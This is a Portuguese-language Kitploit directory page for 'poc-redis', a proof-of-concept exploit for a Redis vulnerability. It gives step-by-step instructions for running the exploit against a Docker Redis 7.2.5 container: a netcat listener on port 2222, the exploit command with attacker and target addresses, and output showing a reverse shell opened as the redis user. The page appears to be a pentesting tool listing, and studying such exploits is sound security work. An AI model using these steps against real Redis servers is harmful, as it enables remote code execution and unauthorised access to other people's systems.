Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
poc-redis — Prova de conceito de exploit para uma vulnerabilidade do Redis que gera uma reverse shell, com instruções de configuração para Docker e listener netcat. | Kitploit
Ferramentas/GitHubGitHub/rop4sh/poc-redis
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubrop4sh/poc-redis

poc-redis

Prova de conceito de exploit para uma vulnerabilidade do Redis que gera uma reverse shell, com instruções de configuração para Docker e listener netcat.

Ver Repositório
1852há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Para executar o exploit, extraia o ZIP anexado e siga estes passos no Linux:

  1. Configure um virtualenv/instale o cliente Redis
root@kitploit:~
$ python3 -m venv .venv
$ source .venv/bin/activate
$ pip install -r requirements.txt
  1. Em outro terminal, execute a imagem docker do Redis
    • Ou compile a partir do código-fonte e execute em uma plataforma suportada
      • O exploit foi testado e funciona no Fedora 40/Ubuntu 24.04
root@kitploit:~
$ docker run -p6379:6379 redis:7.2.5
  1. Obtenha o endereço IP do seu host na rede docker
root@kitploit:~
$ ifconfig
 
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        inet6 fe80::42:53ff:fecc:6e16  prefixlen 64  scopeid 0x20<link>
        ether 02:42:53:cc:6e:16  txqueuelen 0  (Ethernet)
        RX packets 69  bytes 4268 (4.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 133  bytes 269173 (262.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

  1. Em outro terminal, execute um listener netcat:
root@kitploit:~
$ nc -nlvp 2222
  1. Execute o exploit:
  • Substitua lhost pelo endereço IP da sua rede docker
  • root@kitploit:~
    $ python3 exploit.py --lhost 172.17.0.1 --lport 2222 --rhost localhost
    
    1. Você deve receber uma conexão
    root@kitploit:~
    Ncat: Version 7.95 ( https://nmap.org/ncat )
    Ncat: Listening on [::]:2222
    Ncat: Listening on 0.0.0.0:2222
    Ncat: Connection from 172.17.0.2:36518.
    bash: cannot set terminal process group (1): Inappropriate ioctl for device
    bash: no job control in this shell
    redis@4d1537f2dd4e:/data$
    
    
    Baixar ferramenta